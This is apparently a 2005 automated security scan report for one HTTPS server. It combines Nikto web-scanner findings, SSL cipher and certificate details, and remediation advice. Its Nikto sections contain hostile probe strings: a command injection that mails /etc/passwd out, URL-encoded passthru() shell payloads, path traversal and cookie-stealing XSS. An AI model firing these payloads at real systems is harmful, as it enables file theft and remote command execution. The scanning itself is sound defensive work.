XXXXXXX Security Test Report

Sections >> Report info >> Executive summary - Security Risk Overview >> Executive summary - Security Threat Categories >> Executive summary - Security Threat Families >> Host list summary >> Threat list >> Executive summary - Security Top Port List >> Open port list >> Modification list >> Active disabled script list >> High risk threat details >> Medium risk threat details >> Low risk threat details >> Other risk threat details

Report id: E6B54E9C27491DB7BD4E566BEBAB8B34
Report info group: None
Host: IP.OF.THE.SERVER
Date: 2005-10-27 00:03 - 2005-10-27 00:03
Number of tests: 1
Number of threats found: 14

Executive summary - Security Risk Overview

[ High Risk ] These types of threats should be addressed first and are typically easy to exploit. These security threats can compromise the integrity of your data, be used to take your system(s) off-line, or can be used for denial of service (DoS).

[ Medium Risk ] Security threats, which can open your system(s) to unauthorized access or expose your data, are considered medium risk. Although usually (but not always) more complex to exploit, these types of threats are also very important to address.

[ Low Risk ] This level of security threats is used for problems that typically cannot be used independently to gain unauthorized access to your data or compromise your system(s). However, these types of threats are commonly combined with other information to exploit your network.

[ Other Risk ] This classification is used to provide informational data about your system(s). These types of security threats are typically not direct vulnerabilities, but they do expose additional information and data about your network.

Executive summary - Security Threat Categories

[ Hole ] This part of the report is very important. It shows how many security holes Outscan has discovered. They are divided into 4 levels (low to high).

[ Info ] This shows how many enumerations Outscan has found. Information leakage from your server. Usernames, Passwords, Software versions. This method uses four levels (low to high) listed below whilst scanning.

[ Port ] This part of the report contains information on how many services have open ports on your computer that Outscan was able to find using different scanning methods like SYN / FIN / CONNECT() / UDP.

Executive summary - Security Threat Families

Family List: This part of the report list the families with threats detected.

Host list summary

Host: IP.OF.THE.SERVER
High Risk: 1
Medium Risk: 3
Low Risk: 2
Other Risk: 8
Open ports: 1
Time start: 2005-10-27 00:03
Time end: 2005-10-27 00:21
Level: normal
Template: None

Threat list summary

IP.OF.THE.SERVER - 2005-10-27 00:03

High Risk:
  Hole (443/tcp) https
Medium Risk:
  Info (443/tcp) https
  Hole (443/tcp) https
  Info General
Low Risk:
  Hole (443/tcp) https
  Info General
Other Risk:
  Info (443/tcp) https
  Info (443/tcp) https
  Info (443/tcp) https
  Info (443/tcp) https
  Info (443/tcp) https
  Info (443/tcp) https
  Info General
  Info General

Executive summary - Security Top Port List

[ Top Port ] This part of the report list the ports with highest number of threats.

Open port list

IP.OF.THE.SERVER
443 - https (443/tcp) None

Modification list

Active disabled script list

IP.OF.THE.SERVER
None

High risk threat details

Script id: 10864
Name: Nikto
Port: 443
Level: Hole
Family: CGI abuses
Description: Web server scanner
Information: IP.OF.THE.SERVER - 2005-10-27 00:03
Nikto:
+ /cgi-bin/excite IFS=\\"$\\ " /bin/cat /etc/passwd|mail test@test.com - Excite software is vulnerable to password file theft remotely. (GET)
+ /admin/admin_phpinfo.php4 - Mon Album from http://www.3dsrc.com version 0.6.2d allows remote admin access. This should be protected. (GET)
Risk factor: High

Medium risk threat details

Script id: 10864
Name: Nikto
Port: 443
Level: Hole
Family: CGI abuses
Description: Web server scanner
Information: IP.OF.THE.SERVER - 2005-10-27 00:03
Nikto:
+ SSL Info: Ciphers: AES256-SHA
+ The root file (/) redirects to: https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php
+ Allowed HTTP Methods: GET, HEAD, POST
+ / - Redirects to https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php , Default Jrun 2 server running.
+ / - Redirects to https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php , Cisco VoIP Phone deafult web server found.
+ / - Redirects to https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php , Default Sybase Jaguar CTS server running.
+ / - Redirects to https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php , Default Jrun 3 server running.
+ / - Redirects to https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php , Default Lantronix printer found.
+ / - Redirects to https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php , Default IBM Tivoli Server Administration server is running.
+ / - Redirects to https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php , Default Jrun 4 server running.
+ / - Redirects to https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php , Default Xerox WorkCentre server is running.
+ /admin/config.php - PHP Config file may contain database IDs and passwords. (GET)
+ /index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61 %73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53% 5b%72%75%73%68%5d%29.%2527 - Redirects to https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php , phpBB i
+ /index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61 %73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53% 5b%72%75%73%68%5d%29.%2527 - Redirects to https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php , phpBB i
+ /index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%25 27.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%4 1%52%53%5b%72%75%73%68%5d%29.%2527 - Redirects to https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php
+ /index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2 527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56% 41%52%53%5b%72%75%73%68%5d%29.%2527 - Redirects to https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php
+ /?mod=< script>alert(document.cookie)< /script>&op=browse - Redirects to https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php , Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ /?mod=node&nid=some_thing&op=view - Redirects to https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php , Sage 1.0b3 may reveal system paths with invalid module names.
+ /?mod=some_thing&op=browse - Redirects to https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php , Sage 1.0b3 reveals system paths with invalid module names.
+ /?pattern=/etc/*&sort=name - Redirects to https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php , The TCLHttpd 3.4.2 server allows directory listings via dirlist.tcl.
+ /?sql_debug=1 - Redirects to https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php , The PHP-Nuke install may allow attackers to enable debug mode and disclose sensitive information by adding sql_debug=1 to the query string.
+ / - Redirects to https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php , PeopleSoft appears to be running.
+ / - Redirects to https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php , Samba-swat web server. Used to administer Samba.
+ //admin/admin.shtml - Axis network camera may allow admin bypass by using double-slashes before URLs. (GET)
+ //admin/aindex.htm - FlexWATCH firmware 2.2 is vulnerable to authentication bypass by prepending an extra '/'. http://packetstorm.linuxsecurity.com/0310-exploits/FlexWATCH.txt (GET)
+ /admin/admin.php?adminpy=1 - PY-Membres 4.2 may allow administrator access. (GET)
+ /admin/contextAdmin/contextAdmin.html - Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin. (GET)
+ /admin/cplogfile.log - DevBB 1.0 final (http://www.mybboard.com) log file is readable remotely. Upgrade to the latest version. (GET)
+ /admin/database/wwForum.mdb - Web Wiz Forums pre 7.5 is vulnerable to Cross-Site Scripting attacks. Default login/pass is Administrator/letmein (GET)
+ /admin/db.php?dump_sql=1 - e107 allows a dump of the MySQL database without authentication. (GET)
+ /admin/login.php?action=insert&username=test&password=test - phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify. (GET)
+ /admin/phpinfo.php - Immobilier or phPay allows phpinfo() to be run. See http://www.frogman.org/tutos/Immoblier.txt or http://phpay.sourceforge.net/ (GET)
+ /admin/system_footer.php - myphpnuke version 1.8.8_final_7 reveals detailed system information. (GET)
+ /admin/wg_user-info.ml - WebGate Web Eye exposes user names and passwords. OSVDB2922 (GET)
+ /CVS/Entries - CVS Entries file may contain directory listing information. (GET)
+ /forum/memberlist.php?s=23c37cf1af5d2ad05f49361b0407ad9e&what=\\">\\"< script>javascript:alert(document.cookie)< /script> - Vbulletin 2.2.9 and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02. (alert(document.cookie)< /script>)
+ /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 - PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings. OSVDB12184. (GET)
+ /index.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42 - PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings. OSVDB12184. (GET)
+ /index.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42 - PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings. OSVDB12184. (GET)
+ /index.php?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 - PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings. OSVDB12184. (GET)
+ /index.php?|=../../../../../../../../../etc/passwd - Redirects to https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php , Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.
+ Over 20 "Moved" messages, this may be a by-product of the
+ server answering all requests with a "302" or "301" Moved message. You should
+ manually verify your results.
+ /index.php/\\">< script>< script>alert(document.cookie)< /script>< -eZ publish v3 and prior allow Cross Site Scripting (XSS). CA-2000-02. (GET)
+ /manual/ - Web server manual? tsk tsk. (GET)
+ /uploader.php - This script may allow arbitrary files to be uploaded to the remote server. (200)
+ /admin/ - This might be interesting... (GET)
+ /admin/auth.php - This might be interesting... has been seen in web logs from an unknown scanner. (GET)
+ /admin/cfg/configscreen.inc.php+ - This might be interesting... has been seen in web logs from an unknown scanner. (GET)
+ /admin/cfg/configsite.inc.php+ - This might be interesting... has been seen in web logs from an unknown scanner. (GET)
+ /admin/cfg/configsql.inc.php+ - This might be interesting... has been seen in web logs from an unknown scanner. (GET)
+ /admin/cfg/configtache.inc.php+ - This might be interesting... has been seen in web logs from an unknown scanner. (GET)
+ /admin/cms/htmltags.php - This might be interesting... has been seen in web logs from an unknown scanner. (GET)
+ /admin/credit_card_info.php - This might be interesting... has been seen in web logs from an unknown scanner. (GET)
+ /admin/exec.php3 - This might be interesting... has been seen in web logs from an unknown scanner. (GET)
+ /admin/index.php - This might be interesting... has been seen in web logs from an unknown scanner. (GET)
+ /admin/modules/cache.php+ - This might be interesting... has been seen in web logs from an unknown scanner. (GET)
+ /admin/objects.inc.php4 - This might be interesting... has been seen in web logs from an unknown scanner. (GET)
+ /admin/script.php - This might be interesting... has been seen in web logs from an unknown scanner. (GET)
+ /admin/settings.inc.php+ - This might be interesting... has been seen in web logs from an unknown scanner. (GET)
+ /admin/templates/header.php - This might be interesting... has been seen in web logs from an unknown scanner. (GET)
+ /admin/upload.php - This might be interesting... has been seen in web logs from an unknown scanner. (GET)
+ Over 20 "OK" messages, this may be a by-product of the
+ server answering all requests with a "200 OK" message. You should
+ manually verify your results.
Risk factor: Medium

Script id: 10922
Name: CVS/Entries
Port: 443
Level: Info
Family: CGI abuses
Description: Your website allows read access to the CVS/Entries file. This exposes all file names in your CVS module on your website. Change your website permissions to deny access to your CVS directory.
Risk factor : Medium

Script id: 11618
Name: Remote host replies to SYN|FIN
Port: General
Level: Info
Family: Firewalls
Description: The remote host does not discard TCP SYN packets which have the FIN flag set. Depending on the kind of firewall you are using, an attacker may use this flaw to bypass its rules.
Note: *** If the scanned host is a TUNIX/Firewall, this alert can be safely ignored ***
See also :
http://archives.neohapsis.com/archives/bugtraq/2002-10/0266.html
http://www.kb.cert.org/vuls/id/464113
Risk factor : Medium
Solution: Contact your vendor for a patch
Bugtraq: 7487

Low risk threat details

Script id: 10864
Name: Nikto
Port: 443
Level: Hole
Family: CGI abuses
Description: Web server scanner
Information: IP.OF.THE.SERVER - 2005-10-27 00:03
Nikto:
+ /~root - Enumeration of users is possible by requesting ~username (responds with Forbidden for real users, not found for non-existent users) (GET).
+ /./ - Redirects to https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php , Appending '/./' to a directory may reveal php source code.
Risk factor: Low

Script id: 10287
Name: Traceroute
Port: General
Level: Info
Family: Misc.
Description: Makes a traceroute to the remote host. This can be used to gain information on your internet connection helping an attacker to map your network. This information can be used to attack the last server before your and if that server have more access to your server then the rest of the Internet then this can be used to attack services other then the one open to Internet.
Risk factor : Low
Information: IP.OF.THE.SERVER - 2005-10-27 00:03
For your information, here is the traceroute to IP.OF.THE.SERVER :
?
IP.OF.THE.SERVER

Other risk threat details

Script id: 10107
Name: HTTP Server type and version
Port: 443
Level: Info
Family: General
Description: This detects the HTTP Server's type and version. If the attacker is able to determine the version of the running service he/she may easily find the proper tools and exploits thats required to successfully attack the service. But if the banner is changed it will be more difficult to find the tools.
Risk factor : Low
Solution: Configure your server to use an alternate name like 'Wintendo httpD w/Dotmatrix display' Be sure to remove common logos like apache_pb.gif. With Apache, you can set the directive 'ServerTokens Prod' to limit the information emanating from the server in its response headers. On Windows systems you can use a tool that is called URLScan that is developed by Microsoft.
Information: IP.OF.THE.SERVER - 2005-10-27 00:03
The remote web server type is : TUNIX httpsscreen

Script id: 10330
Name: Services
Port: 443
Level: Info
Family: Service detection
Description: This plugin attempts to guess which services are running on the remote ports. For instance, it searches for a web server which could listen on another port than 80 and set the results in the knowledge base.
Risk factor : None
Information:
IP.OF.THE.SERVER - 2005-10-27 00:03 A SSLv2 server answered on this port
IP.OF.THE.SERVER - 2005-10-27 00:03 A web server is running on this port through SSL

Script id: 10863
Name: SSL ciphers
Port: 443
Level: Info
Family: General
Description: This plugin connects to a SSL server, and checks its certificate and the available (shared) SSLv2 ciphers. Weak ciphers are reported.
Information: IP.OF.THE.SERVER - 2005-10-27 00:03
Here is the SSLv2 server certificate:
Certificate:
  Data:
    Version: 3 (0x2)
    Serial Number: 4176025 (0x3fb899)
    Signature Algorithm: md5WithRSAEncryption
    Issuer: C=ZA, ST=Western Cape, L=Cape Town, O=Thawte Consulting cc, OU=Certification Services Division, CN=Thawte Premium Server CA/emailAddress=premiumserver@thawte.com
    Validity
      Not Before: Aug 4 14:38:00 2005 GMT
      Not After : Aug 4 14:38:00 2006 GMT
    Subject: C=NL, ST=Noord-Holland, L=Amsterdam, O=NoiSalviamoIlMondoPuntoCom, OU=ICT, CN=yukka.noisalviamoilmondopuntocom.com
    Subject Public Key Info:
      Public Key Algorithm: rsaEncryption
      RSA Public Key: (1024 bit)
        Exponent: 65537 (0x10001)
    X509v3 extensions:
      X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication
      X509v3 CRL Distribution Points: URI:http://crl.thawte.com/ThawtePremiumServerCA.crl
      Authority Information Access: OCSP - URI:http://ocsp.thawte.com
      X509v3 Basic Constraints: critical CA:FALSE
  Signature Algorithm: md5WithRSAEncryption
Here is the list of available SSLv2 ciphers:
(ciphers containing "EXP" are considered weak)
(ciphers using less than 56 bits are considered weak)
(ciphers using
less than 90 bits are considered medium)
RC4-MD5
EXP-RC4-MD5
RC2-CBC-MD5
EXP-RC2-CBC-MD5
DES-CBC-MD5
DES-CBC3-MD5
RC4-64-MD5
The SSLv2 server offers 5 strong ciphers, but also 0 medium strength and 2 weak/"export class" ciphers. The weak/medium ciphers may be chosen by an export-grade or badly configured client software. They only offer limited protection against a brute force attack
Solution: disable those ciphers and upgrade your client software if possible
This SSLv2 server also accepts SSLv3 connections.
This SSLv2 server also accepts TLSv1 connections.

Script id: 10864
Name: Nikto
Port: 443
Level: Info
Family: CGI abuses
Description: Web server scanner
Information: IP.OF.THE.SERVER - 2005-10-27 00:03
Nikto:
+ Server: TUNIX httpsscreen
+ PHP/4.3.11 appears to be outdated (current is at least 5.0.3)
+ 2433 items checked - 40 item(s) found on remote host(s)
+ 1 host(s) tested

Script id: 11032
Name: Directory Scanner
Port: 443
Level: Info
Family: Misc.
Description: This plugin attempts to determine the presence of various common dirs on the remote web server
Information: IP.OF.THE.SERVER - 2005-10-27 00:03
The following directories were discovered: /CVS, /admin, /archives, /cgi-bin, /css, /download, /icons, /images, /js, /manual, /cbe, /jobs, /xppubwizard
While this is not, in and of itself, a bug, you should manually inspect these directories to ensure that they are in compliance with company security standards
Other references : OWASP:OWASP-CM-006

Script id: 20007
Name: Deprecated SSL Protocol Usage
Port: 443
Level: Info
Family: General
Description: The remote service accepts connections encrypted using SSL 2.0, which reportedly suffers from several cryptographic flaws and has been deprecated for several years. An attacker may be able to exploit these issues to conduct man-in-the-middle attacks or decrypt communications between the affected service and clients.
See also : http://www.schneier.com/paper-ssl.pdf
Risk factor : Low
Solution: Consult the application's documentation to disable SSL 2.0 and use SSL 3.0 or TLS 1.0 instead.

Script id: 10336
Name: Nmap
Port: General
Level: Info
Family: Port scanners
Description: Nmap output:
Information: IP.OF.THE.SERVER - 2005-10-27 00:03
The following TCP ports were technically open, but the connection was closed immediately after entering the established state: 80

Script id: 12053
Name: Host FQDN
Port: General
Level: Info
Family: General
Description: This plugin writes the host FQDN as it could be resolved in the report. There is no security issue associated to it.
Risk factor : None
Information: IP.OF.THE.SERVER - 2005-10-27 00:03
IP.OF.THE.SERVER resolves as yukka.noisalviamoilmondopuntocom.com.